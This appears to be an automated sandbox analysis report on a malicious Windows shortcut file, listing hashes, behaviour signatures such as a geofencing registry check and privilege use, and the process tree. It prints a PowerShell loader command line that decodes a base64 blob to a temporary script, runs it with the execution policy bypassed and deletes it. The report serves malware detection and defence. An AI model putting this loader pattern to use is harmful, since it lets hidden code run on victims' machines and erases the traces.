Analysis
max time kernel: 148s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-11-2024 09:24
Static task: static1
Behavioral task: behavioral1
  Sample: c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
  Resource: win10v2004-20241007-en
General
Target: c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
Size: 2KB
MD5: 62a2b911a0cbbbf5d5f5b3219e5104e4
SHA1: 26eafa71722e807e1e13844456f201d12a75bd72
SHA256: c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463
SHA512: 060027a0f5a0ea24c1cc88dafad85dc2ab6f19fdc76a47f3cf168c4085c39538f1dde60049df00d23454f69a90b8ce07ccb0fbca599e793c901046f75f8da543
Malware Config
Signatures
Blocklisted process makes network request (4 IoCs)
Processes: powershell.exe
flow  pid   Process
7     1276  powershell.exe
21    1276  powershell.exe
36    1276  powershell.exe
41    1276  powershell.exe
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: cmd.exe
description        ioc                                                                                                   Process
Key value queried  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation  cmd.exe
Command and Scripting Interpreter: PowerShell
Processes: powershell.exe, powershell.exe
pid   Process
1276  powershell.exe
1628  powershell.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes: powershell.exe, powershell.exe
pid   Process
1628  powershell.exe
1628  powershell.exe
1276  powershell.exe
1276  powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes: powershell.exe, powershell.exe
description               pid   Process
Token: SeDebugPrivilege   1628  powershell.exe
Token: SeDebugPrivilege   1276  powershell.exe
Suspicious use of WriteProcessMemory (4 IoCs)
Processes: cmd.exe, powershell.exe
description                         pid   Process         procid_target
PID 2276 wrote to memory of 1628    2276  cmd.exe         86
PID 2276 wrote to memory of 1628    2276  cmd.exe         86
PID 1628 wrote to memory of 1276    1628  powershell.exe  88
PID 1628 wrote to memory of 1276    1628  powershell.exe  88
Processes
C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
  PID: 2276
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "ARCHIVO 1512.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\Admin\AppData\Local\Temp\vyrEzcdcTl.ps1"; powershell -executionpolicy bypass -file "$env:TEMP/\vyrEzcdcTl.ps1"; Remove-Item "$env:TEMP/\vyrEzcdcTl.
    PID: 1628
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp/\vyrEzcdcTl.ps1
      PID: 1276
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads